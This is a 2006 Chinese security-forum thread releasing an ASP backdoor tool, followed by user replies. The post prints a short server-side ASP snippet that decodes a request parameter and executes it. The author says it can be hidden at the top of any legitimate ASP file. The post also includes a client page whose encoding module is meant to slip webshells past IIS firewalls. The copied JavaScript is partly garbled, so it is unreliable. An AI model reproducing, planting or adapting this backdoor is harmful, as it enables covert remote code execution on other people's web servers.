[原创]asp万能溶剂v1.1b发布
文章标题:[原创]asp万能溶剂v1.1b发布顶部 虫虫 发布于:2006-09-0814:06 [楼主][原创]asp万能溶剂v1.1b发布
文章作者:虫虫,菜菜
信息来源:邪恶八进制信息安全团队(www.eviloctal)
今天发布asp万能溶剂v1.1b版。发布者:虫虫,菜菜
与上个在E.S.T发布的演示版本相比,该版做了一些改动。
1,服务端代码可以直接复制到任何一个asp文件的头部且不影响该asp文件的正常功能,可以正常访问,而仅在使用溶剂专用客户端登陆时才会发挥溶剂的作用。这样就不需要独立的服务端文件,更隐蔽,更象一个后门。
2,加入了编码模块。加入该模块的目的是躲过某些IIS防火墙的拦截。……当然,仅在已经植入溶剂服务代码后(汗一下先),SecureIIS还是会被1.1b版的溶剂绕过的。如何不被拦截地植入溶剂,就看各位的功底了.^-^
当然这些改动也有一些弊端,例如服务端代码变长了一些,并且不兼容以前的版本。
由于加入了编码模块,导致在溶解较大的webshell时浏览器暂时无法响应,略等一下就可以。
该版本为一个beta版本,如果有什么错误和不足欢迎大家批评指正,谢谢。
虫虫,菜菜,2006年9月7Ri
aspbox.htm,客户端的代码
Copycode
<styletype="text/css">
body,textarea,input
{
font-size:12px;
}
</style>
<script>
functionc1(ns)//非asp代码处理
{
place(/"/igm,"\"\"");
place(/\r\n/igm,"\"+vbCrLf+\"");
s="\nresponse.write\""+s+"\"\n";
returns;
}
functionc()//全部转换成asp代码,因为<%一类的字符会使execute出错,
{
vars=newString(value);
varfinished=newString();
varfi=newString();
varn=0;
place(/<%=(.+?)%>/gm,"<%Response.write$1%>");//先处理<%=xx%>这种情况
varaspCode=newRegExp("<%((.|\r|\n)*?)%>","igm");
(s)!=null)
{
t=RegExp.$1;
s=RegExp.rightContext;
finished+=c1(RegExp.leftContext);
finished+=t;
aspCode.lastIndex=0;
}
if(s!=null){finished+=c1(s);}
value=finished;
}
functionc2(){//编码模块
vars=newString(value);
vart=newString;
vari;
for(i=0;i<s.length;i++){
t=t+(s.charCodeAt(i).toString())+",";}
t=t.substr(t,t.length-1)
value=t;
}
functioncheck()
{
if(document.all.fpath.value==""){alert("输入服务端的url先");}
else{
chm转换txtdocument.all.form1.action=document.all.fpath.value;
if(value==""){alert("把asp木马的内容全部复制过来丫~");}
else{
c();c2();
form1.submit();
}
}
}
functionhelp()
{
alert("\n1,将服务端(默认为aspbox.asp)上传至服务器或植入某asp页\n2,将webshell(如站长助手等)的内容复制到文本域\n3,在下面的文本框写入服务端的URL\n4,溶解,OK,Enjoyyourself!\n\n\n by 虫虫20060907\n [url]hTtP://hI.bAiDU.cOm/aNUiz[/url]");
}
</script>
<bodybgcolor=#f5f5f5>
<center><span>虫虫的ASP万能溶剂v1.1b</span>
<formmethod=postaction=""id=form1>
<inputtype=hiddenname=act_estcc_060907>
<textareaid=textROWS="30"COLS="100"name=aspcode_estcc_060907></textarea>
</form>
BackDoorHere:<inputtype=textid=fpathsize=40>
<buttononclick='check()'>开始溶解!</button><buttononclick=help()>使用说明</button><br><br>
虫虫,更新于2006-09-07<br><ahref=hi.baidu/anuiztarget=_blank>[url]hi.baidu/anuiz</a>[/url]
</center>
服务端的代码
Copycode
<%
estcc=request("aspcode_estcc_060907")
Ifestcc<>""Thensession("estcc")=su7(estcc)
Ifsession("estcc")<>""Then
execute(session("estcc")):response.End
EndIf
Functionsu7(a)
b=Split(a,","):Fori=0ToUBound(b)
su7=su7+chrw(b(i)):next
EndFunction
%>
[此贴被虫虫在2006-09-0814:19重新编辑]
附件:AAV.rar(2K)下载次数:259顶部 那小子真菜 发布于:2006-09-0814:38 [1楼]
用户被禁言,该主题自动屏蔽!顶部 neeao 发布于:2006-09-0820:13 [2楼]
感觉象砍客马的复杂化了,嘿嘿,乱说的!顶部 linzi 发布于:2006-09-0821:12 [3楼]
在BCT内部里看到了,好东西怎么不加精.顶部 剑心 发布于:2006-09-0821:20 [4楼]
Box里的东西
就这么轻易传出来了
可惜顶部 cnhcerkf 发布于:2006-09-0821:35 [5楼]
俺就看着BCT的几个牛人轮流帖。寒了
Quote:
Box里的东西
就这么轻易传出来了
可惜
不敢苟同,你不交流我不交流要论坛干啥。。我本机测试了下。卡得不得了,可能是机器落伍的原因。小菜支持共享学习中。顶部 flowertree 发布于:2006-09-0823:09 [6楼]
人家又没有拿别人的东西。人家共享的是自己的。
闭门造车,不如海纳百川。这大约是八进制兴旺的原因。
还有几个论坛敢说有这里的原创多。
就是因为多虫虫这样共享的好兄弟。
支持一个。顶部 那小子真菜 发布于:2006-09-0912:50 [7楼]
用户被禁言,该主题自动屏蔽!顶部 chongzi168 发布于:2006-09-0914:26 [8楼]
在本机上测试了一下,卡啊~~~我的机器还好啊~~512MB;P42.8G顶部 a21312 发布于:2006-09-0914:47 [9楼]
我机器512内存,最多卡5秒钟就可以了。
测试了2台虚拟主机,结果都是出错。
MicrosoftVBScript编译器错误错误'800a0408'
无效字符
/www/aspbox.asp,行5(c)Copyleft2003-2007,EvilOctalSecurityTeam.
ThisfileisdecompiledbyanunregisteredversionofChmDecompiler.
Regsiteredversiondoesnotshowthismessage.
YoucandownloadChmDecompilerat:www.zipghost/
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论